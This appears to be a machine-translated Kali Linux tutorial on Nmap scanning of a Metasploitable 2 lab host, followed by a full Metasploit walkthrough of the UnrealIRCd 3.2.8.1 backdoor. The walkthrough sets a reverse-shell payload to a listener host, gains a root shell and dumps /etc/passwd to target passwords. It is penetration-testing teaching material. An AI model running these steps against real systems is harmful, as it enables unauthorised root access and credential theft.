Network Scanning and sniffing tool Nmap in the penetration test tutorial of KailLinux

Network Scanning and sniffing tool Nmap in the penetration test tutorial of KailLinux
Network Scanning and sniffing tool Nmap Network scanning and sniffing tool-NmapNmap is a free and open Network scanning and sniffing tool. This tool can scan hosts online, open port numbers, network services, and operating system types. This section describes how to use Nmap. Before using the Nmap tool, you must first understand its scanning types. The main Nmap scan types are shown in Table 4-1.
Table 4-1 Nmap scan type

Instance 4-1: Use nmap to scan the port number of the target host 192.168.6.105. Run the following command:
Root @ kali :~ # Nmap-sS-Pn 192.168.6.105
Starting Nmap 6.46 (http://nmap.org) at CST
Nmap scan report for 192.168.6.105
Host is up (0.00014 s latency ).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslocks
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00: 0C: 29: 13: E0: 3D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds
The above output information shows all the port numbers opened on the target host 192.168.6.105 and the information of the target host. For example, the MAC address of the target host and scanning share 0.48 seconds. In the preceding command, the-sS option indicates tcp syn scan; The-Pn option indicates no ping scan. Tcp syn scanning is used here because the scanning speed is very fast and is not easily discovered by the target host.
If you want to view all the startup services and service versions of the target host, you can specify the-A option of the Nmap tool.
[Instance 4-2] scans all port numbers and service versions on the target host 192.168.6.105. Run the following command:
Root @ kali :~ # Nmap-sS-Pn-A 192.168.6.105
Starting Nmap 6.46 (http://nmap.org) at CST
Nmap scan report for 192.168.6.105
Host is up (0.00035 s latency ).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| _ Ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| Ssh-hostkey:
| 1024 60: 0f: cf: e1: c0: 5f: 6a: 74: d6: 90: 24: fa: c4: d5: 6c: cd (DSA)
| _ 2048 56: 56: 24: 0f: 21: 1d: de: a7: 2b: AE: 61: b1: 24: 3d: e8: f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
| _ Smtp-commands: metasploitable. localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8 BITMIME, DSN,
| Ssl-cert: Subject: commonName = ubuntu804-base.localdomain/organizationName = OCOSA/stateOrProvinceName = There is no such thing outside US/countryName = XX
| Not valid before: 2010-03-17T14: 07: 45 + 00: 00
| _ Not valid after: 2010-04-16T14: 07: 45 + 00: 00
| _ Ssl-date: 2014-07-09T06: 59: 06 + 00: 00;-6d18h27m07s from local time.
53/tcp open domain isc bind 9.4.2
| Dns-nsid:
| _ Bind. version: 9.4.2
80/tcp open http Apache httpd 2.2.8 (Ubuntu) DAV/2)
| _ Http-methods: No Allow or Public header in OPTIONS response (status code 200)
| _ Http-title: Metasploitable2-Linux
......
6667/tcp open irc Unreal ircd
| Irc-info:
| Server: irc. Metasploitable. LAN
| Version: Unreal3.2.8.1. irc. Metasploitable. LAN
| Servers: 1
| Users: 1
| Lservers: 0
| Lusers: 1
| Uptime: 0 days, 20:28:27
| Source host: 45DFBD5E. E9742FE6. FFFA6D49. IP
| _ Source ident: nmap
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| _ Ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| _ Http-favicon: Apache Tomcat
| _ Http-methods: No Allow or Public header in OPTIONS response (status code 200)
| _ Http-title: Apache Tomcat/5.5.
MAC Address: 00: 0C: 29: 13: E0: 3D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o: linux: linux_kernel: 2.6
OS details: Linux 2.6.9-2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable. localdomain, localhost, irc. Metasploitable. LAN; OSs: Unix, Linux; CPE: cpe:/o: linux: linux_kernel
Host script results:
| _ Nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC: (Unknown)
| Smb-OS-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
| _ System time: 2014-07-09T02: 59: 06-04:00
TRACEROUTE
HOP RTT ADDRESS
1 0.35 MS 192.168.6.105
OS and Service detection completed MED. Please report any incorrect results at http://nmap.org/submit.
Nmap done: 1 IP address (1 host up) scanned in 25.58 seconds
From the output information, you can see the service and service software versions started on the target host. For example, the Unreal Internet Relay Chat (IRC) service, whose version is 3.8.1. You can obtain the service version to attack the host. The following describes how to attack a host through a service version in the form of an example.
[Instance 4-3] implements penetration attack on the MSF terminal for the Unreal IRC service. In this example, the Metasploit 2 system is used as the attack target and its address is 192.168.6.105. The procedure is as follows:
(1) Start the MSF terminal. Run the following command:
Root @ kali :~ # Msfconsole
Msf>
After running the preceding command, you can see the msf> prompt indicating that you have successfully logged on to the MSF terminal.
(2) query available modules of Unreal 3.2.8.1. Run the following command:
Msf> search Unreal 3.2.8.1
Matching Modules
======================
Name Disclosure Date Rank Description
-------------------------------------------------------------
Exploit/linux/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Linux)
Exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
Exploit/windows/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Win32)
The output information shows three available modules. In this example, use the unreal_ircd_3281_backdoor module, which has a very good level.
(3) view the unreal_ircd_3281_backdoor module and detailed information about the penetration attacks. Run the following command:
Msf> info exploit/unix/irc/unreal_ircd_3281_backdoor
Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
Module: exploit/unix/irc/unreal_ircd_3281_backdoor
Platform: Unix
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided:
Hdm
Available targets:
Id Name
------
0 Automatic Target
Basic options:
Name Current Setting Required Description
--------------------------------------
RHOST yes The target address
RPORT 6667 yes The target port
Payload information:
Space: 1024
Description:
This module exploits a malicious backdoor that was added to
Unreal IRCD 3.2.8.1 download archive. This backdoor was present in
The Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th
2010.
References:
Http://cvedetails.com/cve/2010-2075/
Http://www.osvdb.org/65445
Http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
The output information shows details about the unreal_ircd_3281_backdoor module. This includes the platform, permission, provider, basic option settings, and description supported by the module.
(4) Select the unreal_ircd_3281_backdoor module and view the option parameters that can be configured for this module. Run the following command:
Msf> use exploit/unix/irc/unreal_ircd_3281_backdoor
Msf exploit (unreal_ircd_3281_backdoor)> show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor ):
Name Current Setting Required Description
--------------------------------------
RHOST yes The target address
RPORT 6667 yes The target port
Exploit target:
Id Name
------
0 Automatic Target
From the output information, we can see two option parameters that must be configured. The RPORT option has been configured, And the RHOST option needs to be configured next.
(5) configure the RHOST option parameters. Run the following command:
Msf exploit (unreal_ircd_3281_backdoor)> set RHOST 192.168.6.105
RHOST => 192.168.6.105
From the output information, we can see that the address of the target host is 192.168.6.105.
(6) view all available attack loads. Run the following command:
Msf exploit (unreal_ircd_3281_backdoor)> show payloads
Compatible Payloads
==============================
Name Disclosure Date Rank Description
------------------------------------------------------------------------------------------
Cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
Cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
Cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
Cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
Cmd/unix/generic normal Unix Command, Generic Command Execution
Cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)
Cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
Cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse tcp ssl (via perl)
Cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
Cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse tcp ssl (via Ruby)
Cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse tcp ssl (telnet)
The output information shows the attack loads that can be loaded in the unreal_ircd_3281_backdoor module. From the description of the output module, we can see that these attack loads are all Shell commands. In this way, you cannot enter the Meterpreter shell, and now you can only use the anti-Shell. When the target host is successfully attacked, the Shell permission on the terminal is also reduced.
(7) use anti-Shell to attack the target host. Select to load the reverse Attack load and view the option parameters that can be configured under the load. Run the following command:
Msf exploit (unreal_ircd_3281_backdoor)> set payload cmd/unix/reverse
Payload => cmd/unix/reverse
Msf exploit (unreal_ircd_3281_backdoor)> show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor ):
Name Current Setting Required Description
--------------------------------------
RHOST 192.168.6.105 yes The target address
RPORT 6667 yes The target port
Payload options (cmd/unix/reverse ):
Name Current Setting Required Description
--------------------------------------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
------
0 Automatic Target
From the output result, we can see that the LHOST option parameter is not configured.
(8) configure the LHOST option parameters. Run the following command:
Msf exploit (unreal_ircd_3281_backdoor)> set LHOST 192.168.6.103
LHOST => 192.168.6.103
Run the preceding command to view the configuration of all option parameters again. Run the following command:
Msf exploit (unreal_ircd_3281_backdoor)> show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor ):
Name Current Setting Required Description
--------------------------------------
RHOST 192.168.6.105 yes The target address
RPORT 6667 yes The target port
Payload options (cmd/unix/reverse ):
Name Current Setting Required Description
--------------------------------------
LHOST 192.168.6.103 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
------
0 Automatic Target
From the output information, you can see that all options are configured. Next we can launch an attack.
(9) Launch penetration attacks. Run the following command:
Msf exploit (unreal_ircd_3281_backdoor)> exploit
[*] Started reverse double handler
[*] Connected to 192.168.6.105: 6667...
: Irc. Metasploitable. lan notice auth: *** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4G58mrIzlfNG2zIm;
[*] Writing to socket
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4G58mrIzlfNG2zIm \ r \ n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.6.103: 4444-> 192.168.6.105: 53656) at 09:34:05 + 0800
From the output information, we can see that a session is successfully opened. But there is no Shell prompt, there is only one blinking cursor. This means to connect to a terminal Shell of the target host. At this time, you can execute any standard Linux Command. For example, to view the username currently logged on to the target system, run the following command:
Whoami
After the preceding command is executed, the following information is displayed:
Root
The output information shows that the user currently logged on is the Super User root.
To view the password file of the target system, run the following command:
Cat/etc/passwd
Root: x: 0: 0: root:/bin/bash
Daemon: x: 1: 1: daemon:/usr/sbin:/bin/sh
Bin: x: 2: 2: bin:/bin/sh
Sys: x: 3: 3: sys:/dev:/bin/sh
Sync: x: 4: 65534: sync:/bin/sync
Games: x: 5: 60: games:/usr/games:/bin/sh
Man: x: 6: 12: man:/var/cache/man:/bin/sh
Lp: x: 7: 7: lp:/var/spool/lpd:/bin/sh
Mail: x: 8: 8: mail:/var/mail:/bin/sh
News: x: 9: 9: news:/var/spool/news:/bin/sh
Uucp: x: 10: 10: uucp:/var/spool/uucp:/bin/sh
Proxy: x: 13: 13: proxy:/bin/sh
Www-data: x: 33: 33: www-data:/var/www:/bin/sh
Backup: x: 34: 34: backup:/var/backups:/bin/sh
List: x: 38: 38: Mailing List Manager:/var/list:/bin/sh
Irc: x: 39: 39: ircd:/var/run/ircd:/bin/sh
Gnats: x: 41: 41: Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
Nobody: x: 65534: 65534: nobody:/nonexistent:/bin/sh
Libuuid: x: 100: 101:/var/lib/libuuid:/bin/sh
Dhcp: x: 101: 102:/nonexistent:/bin/false
Syslog: x: 102: 103:/home/syslog:/bin/false
Klog: x: 103: 104:/home/klog:/bin/false
Sshd: x: 104: 65534:/var/run/sshd:/usr/sbin/nologin
Msfadmin: x: 1000: 1000: msfadmin,:/home/msfadmin:/bin/bash
Binary: x: 105: 113:/var/cache/bind:/bin/false
Postfix: x: 106: 115:/var/spool/postfix:/bin/false
Ftp: x: 107: 65534:/home/ftp:/bin/false
S: x: 108: 117: PostgreSQL administrator,:/var/lib/postgresql:/bin/bash
Mysql: x: 109: 118: MySQL Server,:/var/lib/mysql:/bin/false
Tomcat55: x: 110: 65534:/usr/share/tomcat5.5:/bin/false
Distccd: x: 111: 65534: // bin/false
User: x: 1001: 1001: just a user, 111,:/home/user:/bin/bash
Service: x: 1002: 1002:,:/home/service:/bin/bash
Telnetd: x: 112: 120:/nonexistent:/bin/false
Proftpd: x: 113: 65534:/var/run/proftpd:/bin/false
Statd: x: 114: 65534:/var/lib/nfs:/bin/false
Snmp: x: 115: 65534:/var/lib/snmp:/bin/false
The output information shows all the user information in the target system. The user can attack the user's password on the target host based on the information.